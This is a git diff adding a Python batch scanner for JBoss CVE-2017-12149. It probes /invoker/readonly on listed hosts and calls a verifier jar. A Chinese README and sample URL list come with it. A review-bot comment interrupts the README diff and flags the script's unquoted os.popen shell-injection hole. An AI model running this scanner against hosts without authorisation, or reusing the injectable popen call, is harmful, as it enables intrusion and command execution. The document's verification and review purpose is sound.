diff --git a/Jboss-cve201712149-pl.py b/Jboss-cve201712149-pl.py
new file mode 100644
index 0000000..7136d9b
--- /dev/null
+++ b/Jboss-cve201712149-pl.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python
+#coding:utf-8
+#author:Ja0k
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+import os,sys,requests
+import urllib3
+urllib3.disable_warnings()
+
+#access http://*.*.*.*/invoker/readonly return 500
+def url_Test(url):
+ POC_url="/invoker/readonly"
+ headers={"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
+ "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+ "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding": "gzip, deflate",
+ "Connection": "close",
+ "Upgrade-Insecure-Requests": "1",
+ "Content-Type": "application/x-www-form-urlencoded"}
+ try:
+ code=requests.get(url+POC_url,headers=headers,timeout=5,verify=False).status_code
+ if code == int(500):
+ print "%s/invoker/readonly maybe use HttpInvoker! \n" %url
+ return True
+ except requests.exceptions.ConnectionError, e:
+ pass
+
+#POC RCE
+def Poc_Test(url):
+ output=os.popen("java -jar verify_CVE-2017-12149.jar %s" %url)
+ if "vuln"in output.read():
+ print "%s is Vul-Jboss-cve-2017-12149! \n" %url
+
+
+if __name__ == "__main__":
+ if len(sys.argv) < 2:
+ print "Usage: %s urllist.txt \nurl-format:http://1.1.1.1:8080" %sys.argv[0]
+ exit()
+ for i in open(sys.argv[1],'r').readlines():
+ url=i.strip()
+ if url_Test(url):
+ Poc_Test(url)
\ No newline at end of file
diff --git a/README.md b/README.md
index 1f7e6ef..a41d7cf 100644
--- a/README.md
+++ b/README.md
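Review bot: Poc_Test passes each line of the URL list to a shell unquoted via `os.popen("java -jar verify_CVE-2017-12149.jar %s" %url)`, so shell metacharacters in a urllist.txt of unknown origin execute on the host running the scan. Passing an argument list avoids the shell and keeps the same exit-status-agnostic behaviour as os.popen: `import subprocess` next to the other imports, then `output = subprocess.Popen(["java", "-jar", "verify_CVE-2017-12149.jar", url], stdout=subprocess.PIPE).communicate()[0]` and `if "vuln" in output:`. In url_Test, `except requests.exceptions.ConnectionError, e:` does not cover a read timeout or a malformed line (requests.exceptions.ReadTimeout and MissingSchema are not ConnectionErrors), so one slow or garbled entry raises out of the main loop and ends the whole batch; catching `requests.exceptions.RequestException` keeps the loop going. The unused `e` and the file handle left open by `open(sys.argv[1],'r').readlines()` are minor; a `with open(sys.argv[1]) as f:` block over the loop fixes the latter.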
@@ -1,2 +1,31 @@
-# vuln
-python/vul/poc/exp/
+#
+1.jboss反序列化_CVE-2017-12149.jar GUI
+jboss-_CVE-2017-12149
+
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+
+2.漏洞验证
+verify_CVE-2017-12149.jar提供命令行模式下验证漏洞,如果漏洞存在返回特征字符串,只需要执行命令:
+
+```shell/cmd
+$ java -jar verify_CVE-2017-12149.jar http://xxx:8080
+
+#成功返回:
+vuln6581362514513155613jboss
+```
+#referer:https://github.com/yunxu1/jboss-_CVE-2017-12149
+
+3.批量验证漏洞(支持http/https协议)
+```shell/cmd
+$ python Jboss-cve201712149-pl.py urllist.txt
+```
+urllist.txt-format:
+http://1.1.1.1:8080
+```
+#成功返回:
+```
+http://192.168.1.10:8080/invoker/readonly maybe use HttpInvoker!
+http://192.168.1.10:8080 is Vul-Jboss-cve-2017-12149!
+```
+ps:py运行需要安装requests 库
+pip install requests
diff --git a/jboss_CVE-2017-12149/1 b/jboss_CVE-2017-12149/1
new file mode 100644
index 0000000..d00491f
--- /dev/null
+++ b/jboss_CVE-2017-12149/1
@@ -0,0 +1 @@
+1
diff --git "a/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar" "b/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar"
new file mode 100644
index 0000000..f09a6c9
Binary files /dev/null and "b/jboss\345\217\215\345\272\217\345\210\227\345\214\226_CVE-2017-12149.jar" differ
diff --git a/urllist.txt b/urllist.txt
new file mode 100644
index 0000000..fbdc1c3
--- /dev/null
+++ b/urllist.txt
@@ -0,0 +1 @@
+http://192.168.1.10:8080
\ No newline at end of file
diff --git a/verify_CVE-2017-12149.jar b/verify_CVE-2017-12149.jar
new file mode 100644
index 0000000..3bc29d7
Binary files /dev/null and b/verify_CVE-2017-12149.jar differ
diff --git "a/\346\210\252\345\233\276.jpg" "b/\346\210\252\345\233\276.jpg"
new file mode 100644
index 0000000..4def81c
Binary files /dev/null and "b/\346\210\252\345\233\276.jpg" differ
diff --git "a/\346\210\252\345\233\2762.png" "b/\346\210\252\345\233\2762.png"
new file mode 100644
index 0000000..72e22a0
Binary files /dev/null and "b/\346\210\252\345\233\2762.png" differ
diff --git "a/\346\210\252\345\233\2763.png" "b/\346\210\252\345\233\2763.png"
new file mode 100644
index 0000000..ba79676
Binary files /dev/null and "b/\346\210\252\345\233\2763.png" differ